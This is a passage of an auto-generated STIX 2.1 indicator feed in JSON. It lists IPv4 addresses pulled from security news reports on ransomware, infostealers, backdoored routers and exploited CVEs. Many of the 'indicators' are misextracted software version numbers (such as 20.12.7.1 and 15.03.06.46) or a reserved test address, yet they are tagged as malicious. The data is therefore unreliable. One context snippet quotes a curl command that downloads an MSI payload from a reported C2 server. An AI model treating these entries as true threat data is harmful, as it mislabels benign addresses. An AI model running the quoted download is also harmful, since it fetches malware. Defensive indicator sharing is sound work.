KEV as Web Shell Attacks Continue\" (The Hacker News). Context: 5 104.243.35.0/24 104.194.9.14 209.222.98.44 185.227.83.236 78.128.113.10 38.60.157.212 216.152.151.204 104.243.35.63 5.180.41.35 (At","pattern":"[ipv4-addr:value = '78.128.113.10']","pattern_type":"stix","valid_from":"2026-07-25T09:59:03.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/06/cisa-adds-exploited-ptc-windchill-rce.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f0d6f08a-af83-4fc4-9f34-0d7dc3355a90","created":"2026-07-23T10:00:38.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 172.86.126.18","description":"Seen in \"Chaos ransomware's msaRAT: Living off the browser to build a covert C2 channel\" (Cisco Talos). Context: this traffic will pass through undetected. curl.exe http://172.86.126.18:443/update_ms.msi -o C:\\programdata\\update_ms.msi The prope","pattern":"[ipv4-addr:value = '172.86.126.18']","pattern_type":"stix","valid_from":"2026-07-23T10:00:38.000Z","labels":["auto-extracted","ransomware"],"confidence":30,"external_references":[{"source_name":"Cisco Talos","url":"https://blog.talosintelligence.com/chaos-msarat-living-off-the-browser-to-build-covert-c2-channel/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--62323866-c949-4e51-b2db-8ec7cccd2d29","created":"2026-07-16T00:00:00.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 82.114.160.93","description":"Seen in \"Yemeni War Emphasizes Importance of Internet Control in Statecraft and Conflict/yemen-internet\" (Recorded Future). Context: itional Netsweeper devices on YemenNet on two IP addresses: 82.114.160.93 and 82.114.160.94. The device identified on 82.114.160.98 w","pattern":"[ipv4-addr:value = '82.114.160.93']","pattern_type":"stix","valid_from":"2026-07-16T00:00:00.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"Recorded Future","url":"https://www.recordedfuture.com/research/yemen-internet-control"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a96b7995-b310-4b10-bff0-a0aa5d45f3b3","created":"2026-07-16T00:00:00.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 82.114.160.98","description":"Seen in \"Yemeni War Emphasizes Importance of Internet Control in Statecraft and Conflict/yemen-internet\" (Recorded Future). Context: : 82.114.160.93 and 82.114.160.94. The device identified on 82.114.160.98 was still up at the time of this analysis. The re-emergence","pattern":"[ipv4-addr:value = '82.114.160.98']","pattern_type":"stix","valid_from":"2026-07-16T00:00:00.000Z","labels":["auto-extracted","breach"],"confidence":30,"external_references":[{"source_name":"Recorded Future","url":"https://www.recordedfuture.com/research/yemen-internet-control"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--53c7509f-f244-405f-a2a2-0b4f20fd1066","created":"2026-07-14T07:42:53.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 179.43.166.242","description":"Seen in \"CrashStealer: New macOS Infostealer Uses Signed Apps to Evade Gatekeeper\" (Security Affairs). Context: eporting component. The Info.plist contains the C2 address, 179.43.166.242, hardcoded as an App Transport Security exception, visible","pattern":"[ipv4-addr:value = '179.43.166.242']","pattern_type":"stix","valid_from":"2026-07-14T07:42:53.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Security Affairs","url":"https://securityaffairs.com/195278/malware/crashstealer-new-macos-infostealer-uses-signed-apps-to-evade-gatekeeper.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--49d4c18f-40a0-445e-af90-8665aa46bc9b","created":"2026-07-10T11:30:02.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 2.9.99.5","description":"Seen in \"Exposed Hacker Server Reveals WP-SHELLSTORM Backdooring Thousands of WordPress Sites\" (The Hacker News). Context: s here. Treat the Joomla JCE flaw (CVE-2026-48907, fixed in 2.9.99.5) as urgent too, since it is a maximum-severity and on CISA'","pattern":"[ipv4-addr:value = '2.9.99.5']","pattern_type":"stix","valid_from":"2026-07-10T11:30:02.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/07/exposed-hacker-server-reveals-wp.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9f7a3f7f-b357-4d69-90fd-f92b37e5889a","created":"2026-07-07T08:28:04.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 159.198.41.140","description":"Seen in \"AI-Generated Malware Powers New Armored Likho APT Campaign\" (Security Affairs). Context: ves the second-stage payload. C2 infrastructure resolves to 159.198.41.140, with tunneling routed through 159.198.32[.]222, and the do","pattern":"[ipv4-addr:value = '159.198.41.140']","pattern_type":"stix","valid_from":"2026-07-07T08:28:04.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Security Affairs","url":"https://securityaffairs.com/194854/apt/ai-generated-malware-powers-new-armored-likho-apt-campaign.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--878603da-ffd0-4261-a448-4efa32fdaede","created":"2026-07-07T06:40:47.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 1.2.0.14","description":"Seen in \"CERT/CC Warns of Hidden Admin Backdoor in Tenda Router Firmware\" (The Hacker News). Context: mpacts multiple versions of the firmware - US_FH1201V1.0BR_V1.2.0.14(408)_EN_TD US_W15EV1.0br_V15.11.0.5(1068_1567_841)_EN_TDE U","pattern":"[ipv4-addr:value = '1.2.0.14']","pattern_type":"stix","valid_from":"2026-07-07T06:40:47.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/07/certcc-warns-of-hidden-admin-backdoor.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e33088e5-5e50-4ab4-93de-a2dbaee72ebb","created":"2026-07-07T06:40:47.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 15.03.06.46","description":"Seen in \"CERT/CC Warns of Hidden Admin Backdoor in Tenda Router Firmware\" (The Hacker News). Context: _W15EV1.0br_V15.11.0.5(1068_1567_841)_EN_TDE US_AC10V1.0re_V15.03.06.46_multi_TDE01 US_AC5V1.0RTL_V15.03.06.48_multi_TDE01 US_AC6V2","pattern":"[ipv4-addr:value = '15.03.06.46']","pattern_type":"stix","valid_from":"2026-07-07T06:40:47.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/07/certcc-warns-of-hidden-admin-backdoor.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--08225b25-fef0-4e31-af10-2c6a459320ce","created":"2026-07-07T06:40:47.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 15.03.06.48","description":"Seen in \"CERT/CC Warns of Hidden Admin Backdoor in Tenda Router Firmware\" (The Hacker News). Context: N_TDE US_AC10V1.0re_V15.03.06.46_multi_TDE01 US_AC5V1.0RTL_V15.03.06.48_multi_TDE01 US_AC6V2.0RTL_V15.03.06.51_multi_T The backdoor","pattern":"[ipv4-addr:value = '15.03.06.48']","pattern_type":"stix","valid_from":"2026-07-07T06:40:47.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/07/certcc-warns-of-hidden-admin-backdoor.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7d0bc60a-f97a-4d47-b7dd-0734ce2eeb1e","created":"2026-07-07T06:40:47.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 15.03.06.51","description":"Seen in \"CERT/CC Warns of Hidden Admin Backdoor in Tenda Router Firmware\" (The Hacker News). Context: TDE01 US_AC5V1.0RTL_V15.03.06.48_multi_TDE01 US_AC6V2.0RTL_V15.03.06.51_multi_T The backdoor functionality is present within the \"l","pattern":"[ipv4-addr:value = '15.03.06.51']","pattern_type":"stix","valid_from":"2026-07-07T06:40:47.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/07/certcc-warns-of-hidden-admin-backdoor.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--87e2e323-e24a-4fbc-a8f3-c0078ffe15f0","created":"2026-07-07T06:40:47.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 15.11.0.5","description":"Seen in \"CERT/CC Warns of Hidden Admin Backdoor in Tenda Router Firmware\" (The Hacker News). Context: mware - US_FH1201V1.0BR_V1.2.0.14(408)_EN_TD US_W15EV1.0br_V15.11.0.5(1068_1567_841)_EN_TDE US_AC10V1.0re_V15.03.06.46_multi_TDE0","pattern":"[ipv4-addr:value = '15.11.0.5']","pattern_type":"stix","valid_from":"2026-07-07T06:40:47.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/07/certcc-warns-of-hidden-admin-backdoor.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bbeee0ea-5e29-4552-bf89-5691eed9cd01","created":"2026-07-04T16:53:38.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 62.182.81.38","description":"Seen in \"U.S. Government Agency Paid $1M to Data Extortion Group Kairos\" (Security Affairs). Context: likely backend server for the Kairos leak site resolving to 62.182.81.38, hosted on Virtual Systems LLC in Ukraine, an ASN that has","pattern":"[ipv4-addr:value = '62.182.81.38']","pattern_type":"stix","valid_from":"2026-07-04T16:53:38.000Z","labels":["auto-extracted","ransomware"],"confidence":30,"external_references":[{"source_name":"Security Affairs","url":"https://securityaffairs.com/194750/security/u-s-government-agency-paid-1m-to-data-extortion-group-kairos.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9a3b4058-891c-4cd9-a8d7-e35118d9be58","created":"2026-07-04T16:08:24.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 45.148.10.212","description":"Seen in \"FBI: TeamPCP Compromised Dev Tools to Steal Cloud Credentials\" (Security Affairs). Context: . Six IP addresses appear in the indicators: 83.142.209.11, 45.148.10.212, 83.142.209.194, 83.142.209.203, 94.154.172.43, and 67.217.","pattern":"[ipv4-addr:value = '45.148.10.212']","pattern_type":"stix","valid_from":"2026-07-04T16:08:24.000Z","labels":["auto-extracted","ransomware"],"confidence":30,"external_references":[{"source_name":"Security Affairs","url":"https://securityaffairs.com/194741/cyber-crime/fbi-teampcp-compromised-dev-tools-to-steal-cloud-credentials.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d2fe8bd6-af15-48ef-920f-690022cd3a4f","created":"2026-07-04T16:08:24.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 83.142.209.11","description":"Seen in \"FBI: TeamPCP Compromised Dev Tools to Steal Cloud Credentials\" (Security Affairs). Context: CVE-2025-55182 . Six IP addresses appear in the indicators: 83.142.209.11, 45.148.10.212, 83.142.209.194, 83.142.209.203, 94.154.172.","pattern":"[ipv4-addr:value = '83.142.209.11']","pattern_type":"stix","valid_from":"2026-07-04T16:08:24.000Z","labels":["auto-extracted","ransomware"],"confidence":30,"external_references":[{"source_name":"Security Affairs","url":"https://securityaffairs.com/194741/cyber-crime/fbi-teampcp-compromised-dev-tools-to-steal-cloud-credentials.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--12f0a5ed-1197-4548-bc7b-8700f2f69ab5","created":"2026-07-04T16:08:24.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 83.142.209.194","description":"Seen in \"FBI: TeamPCP Compromised Dev Tools to Steal Cloud Credentials\" (Security Affairs). Context: ses appear in the indicators: 83.142.209.11, 45.148.10.212, 83.142.209.194, 83.142.209.203, 94.154.172.43, and 67.217.57.240. The indi","pattern":"[ipv4-addr:value = '83.142.209.194']","pattern_type":"stix","valid_from":"2026-07-04T16:08:24.000Z","labels":["auto-extracted","ransomware"],"confidence":30,"external_references":[{"source_name":"Security Affairs","url":"https://securityaffairs.com/194741/cyber-crime/fbi-teampcp-compromised-dev-tools-to-steal-cloud-credentials.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d6a09850-a425-450d-a947-2d6a249aa644","created":"2026-07-04T16:08:24.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 83.142.209.203","description":"Seen in \"FBI: TeamPCP Compromised Dev Tools to Steal Cloud Credentials\" (Security Affairs). Context: e indicators: 83.142.209.11, 45.148.10.212, 83.142.209.194, 83.142.209.203, 94.154.172.43, and 67.217.57.240. The indicator set also i","pattern":"[ipv4-addr:value = '83.142.209.203']","pattern_type":"stix","valid_from":"2026-07-04T16:08:24.000Z","labels":["auto-extracted","ransomware"],"confidence":30,"external_references":[{"source_name":"Security Affairs","url":"https://securityaffairs.com/194741/cyber-crime/fbi-teampcp-compromised-dev-tools-to-steal-cloud-credentials.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e7b3a1b8-0ee4-486d-a9db-9ee829c3e40c","created":"2026-07-04T16:08:24.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 94.154.172.43","description":"Seen in \"FBI: TeamPCP Compromised Dev Tools to Steal Cloud Credentials\" (Security Affairs). Context: .142.209.11, 45.148.10.212, 83.142.209.194, 83.142.209.203, 94.154.172.43, and 67.217.57.240. The indicator set also includes 27 file","pattern":"[ipv4-addr:value = '94.154.172.43']","pattern_type":"stix","valid_from":"2026-07-04T16:08:24.000Z","labels":["auto-extracted","ransomware"],"confidence":30,"external_references":[{"source_name":"Security Affairs","url":"https://securityaffairs.com/194741/cyber-crime/fbi-teampcp-compromised-dev-tools-to-steal-cloud-credentials.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--863895e9-7253-40b3-a2bd-c48ba4dc5c5d","created":"2026-07-01T10:25:06.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 192.0.2.1","description":"Seen in \"RustDuck: The Botnet That's Still Small but Engineering Like It Plans to Grow\" (Security Affairs). Context: worth 35 points makes an asynchronous connection attempt to 192.0.2.1, an IP address reserved for testing that should never respo","pattern":"[ipv4-addr:value = '192.0.2.1']","pattern_type":"stix","valid_from":"2026-07-01T10:25:06.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Security Affairs","url":"https://securityaffairs.com/194556/malware/rustduck-the-botnet-thats-still-small-but-engineering-like-it-plans-to-grow.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--84a98ae2-ba78-4c4d-aa0b-4fea792413a3","created":"2026-06-25T05:31:14.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 20.12.7.1","description":"Seen in \"Cisco Catalyst SD-WAN Manager CVE-2026\" (The Hacker News). Context: Catalyst SD-WAN - 20.9.9.1 and earlier (Fixed in 20.9.9.2) 20.12.7.1 and earlier (Fixed in 20.12.7.2) 20.15.4.4 and earlier (Fix","pattern":"[ipv4-addr:value = '20.12.7.1']","pattern_type":"stix","valid_from":"2026-06-25T05:31:14.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/06/cisco-catalyst-sd-wan-manager-cve-2026.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--47695b3f-aae1-42db-9894-1181525b04a7","created":"2026-06-25T05:31:14.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 20.12.7.2","description":"Seen in \"Cisco Catalyst SD-WAN Manager CVE-2026\" (The Hacker News). Context: earlier (Fixed in 20.9.9.2) 20.12.7.1 and earlier (Fixed in 20.12.7.2) 20.15.4.4 and earlier (Fixed in 20.15.4.5) 20.15.5.2 and e","pattern":"[ipv4-addr:value = '20.12.7.2']","pattern_type":"stix","valid_from":"2026-06-25T05:31:14.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/06/cisco-catalyst-sd-wan-manager-cve-2026.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b917874b-43d8-4767-8e5d-dd71c3b544b7","created":"2026-06-25T05:31:14.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 20.15.4.4","description":"Seen in \"Cisco Catalyst SD-WAN Manager CVE-2026\" (The Hacker News). Context: xed in 20.9.9.2) 20.12.7.1 and earlier (Fixed in 20.12.7.2) 20.15.4.4 and earlier (Fixed in 20.15.4.5) 20.15.5.2 and earlier (Fix","pattern":"[ipv4-addr:value = '20.15.4.4']","pattern_type":"stix","valid_from":"2026-06-25T05:31:14.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/06/cisco-catalyst-sd-wan-manager-cve-2026.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7d9af07a-e41c-4f6f-b287-caa742d646a7","created":"2026-06-25T05:31:14.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 20.15.4.5","description":"Seen in \"Cisco Catalyst SD-WAN Manager CVE-2026\" (The Hacker News). Context: arlier (Fixed in 20.12.7.2) 20.15.4.4 and earlier (Fixed in 20.15.4.5) 20.15.5.2 and earlier (Fixed in 20.15.5.3) 20.18.3 (Fixed","pattern":"[ipv4-addr:value = '20.15.4.5']","pattern_type":"stix","valid_from":"2026-06-25T05:31:14.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/06/cisco-catalyst-sd-wan-manager-cve-2026.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--35b6227e-bcaa-4e7f-a6f6-e2c444f41219","created":"2026-06-25T05:31:14.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 20.15.5.2","description":"Seen in \"Cisco Catalyst SD-WAN Manager CVE-2026\" (The Hacker News). Context: ed in 20.12.7.2) 20.15.4.4 and earlier (Fixed in 20.15.4.5) 20.15.5.2 and earlier (Fixed in 20.15.5.3) 20.18.3 (Fixed in 20.18.3.","pattern":"[ipv4-addr:value = '20.15.5.2']","pattern_type":"stix","valid_from":"2026-06-25T05:31:14.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/06/cisco-catalyst-sd-wan-manager-cve-2026.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--48ec58a9-a583-4db4-a0df-39e5574c3837","created":"2026-06-25T05:31:14.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 20.15.5.3","description":"Seen in \"Cisco Catalyst SD-WAN Manager CVE-2026\" (The Hacker News). Context: arlier (Fixed in 20.15.4.5) 20.15.5.2 and earlier (Fixed in 20.15.5.3) 20.18.3 (Fixed in 20.18.3.1) 26.1.1.1 and earlier (Fixed i","pattern":"[ipv4-addr:value = '20.15.5.3']","pattern_type":"stix","valid_from":"2026-06-25T05:31:14.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/06/cisco-catalyst-sd-wan-manager-cve-2026.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d04c0fdb-af1f-4fdf-8795-c887ce98a8b5","created":"2026-06-25T05:31:14.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 20.18.3.1","description":"Seen in \"Cisco Catalyst SD-WAN Manager CVE-2026\" (The Hacker News). Context: 0.15.5.2 and earlier (Fixed in 20.15.5.3) 20.18.3 (Fixed in 20.18.3.1) 26.1.1.1 and earlier (Fixed in 26.1.1.2) Found this articl","pattern":"[ipv4-addr:value = '20.18.3.1']","pattern_type":"stix","valid_from":"2026-06-25T05:31:14.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/06/cisco-catalyst-sd-wan-manager-cve-2026.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d614cc65-2271-4b06-9fac-776fb3764b76","created":"2026-06-25T05:31:14.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 20.9.9.1","description":"Seen in \"Cisco Catalyst SD-WAN Manager CVE-2026\" (The Hacker News). Context: lable for the following versions of Cisco Catalyst SD-WAN - 20.9.9.1 and earlier (Fixed in 20.9.9.2) 20.12.7.1 and earlier (Fixe","pattern":"[ipv4-addr:value = '20.9.9.1']","pattern_type":"stix","valid_from":"2026-06-25T05:31:14.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/06/cisco-catalyst-sd-wan-manager-cve-2026.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7637f911-e650-47de-b79c-2b4e3488e56c","created":"2026-06-25T05:31:14.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 20.9.9.2","description":"Seen in \"Cisco Catalyst SD-WAN Manager CVE-2026\" (The Hacker News). Context: s of Cisco Catalyst SD-WAN - 20.9.9.1 and earlier (Fixed in 20.9.9.2) 20.12.7.1 and earlier (Fixed in 20.12.7.2) 20.15.4.4 and e","pattern":"[ipv4-addr:value = '20.9.9.2']","pattern_type":"stix","valid_from":"2026-06-25T05:31:14.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/06/cisco-catalyst-sd-wan-manager-cve-2026.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d2b90588-7efe-4a56-90f4-fca008e93440","created":"2026-06-25T05:31:14.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 26.1.1.1","description":"Seen in \"Cisco Catalyst SD-WAN Manager CVE-2026\" (The Hacker News). Context: d earlier (Fixed in 20.15.5.3) 20.18.3 (Fixed in 20.18.3.1) 26.1.1.1 and earlier (Fixed in 26.1.1.2) Found this article interest","pattern":"[ipv4-addr:value = '26.1.1.1']","pattern_type":"stix","valid_from":"2026-06-25T05:31:14.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/06/cisco-catalyst-sd-wan-manager-cve-2026.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3e3d435e-b1b8-4978-857a-9113578cc697","created":"2026-06-25T05:31:14.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 26.1.1.2","description":"Seen in \"Cisco Catalyst SD-WAN Manager CVE-2026\" (The Hacker News). Context: 20.18.3 (Fixed in 20.18.3.1) 26.1.1.1 and earlier (Fixed in 26.1.1.2) Found this article interesting? Follow us on Google News ,","pattern":"[ipv4-addr:value = '26.1.1.2']","pattern_type":"stix","valid_from":"2026-06-25T05:31:14.000Z","labels":["auto-extracted","exploit"],"confidence":30,"external_references":[{"source_name":"The Hacker News","url":"https://thehackernews.com/2026/06/cisco-catalyst-sd-wan-manager-cve-2026.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e5600c9a-c604-4092-b8a8-97504fac3a33","created":"2026-06-22T20:26:43.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 202.61.160.201","description":"Seen in \"WhatsApp Malware Campaign Hijacks Trust, Installs Legitimate Admin Tools\" (Security Affairs). Context: ker-controlled management servers. One of those server IPs, 202.61.160.201, had previously appeared in infrastructure linked to Valley","pattern":"[ipv4-addr:value = '202.61.160.201']","pattern_type":"stix","valid_from":"2026-06-22T20:26:43.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Security Affairs","url":"https://securityaffairs.com/194031/malware/whatsapp-malware-campaign-hijacks-trust-installs-legitimate-admin-tools.html"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b3801b84-58eb-438b-92c4-50adc5ab4c25","created":"2026-06-22T08:27:05.000Z","modified":"2026-09-16T10:05:33.383Z","created_by_ref":"identity--0a139d94-71c3-4c17-af4a-7b39be8d2a41","name":"ipv4: 107.150.106.14","description":"Seen in \"4,300+ Outdated Routers Hijacked in Stealthy Spy Infrastructure by AryStinger malware\" (Security Affairs). Context: s XLab threat detection system flagged a single IP address, 107.150.106.14, spreading a Linux binary through two vulnerabilities that","pattern":"[ipv4-addr:value = '107.150.106.14']","pattern_type":"stix","valid_from":"2026-06-22T08:27:05.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Security Affairs","url":"https://securityaffairs.com/193987/security/4300-outdated-routers-hijacked-in-stealthy-spy-infrastructure-by-arystinger-malware.html"}]}]}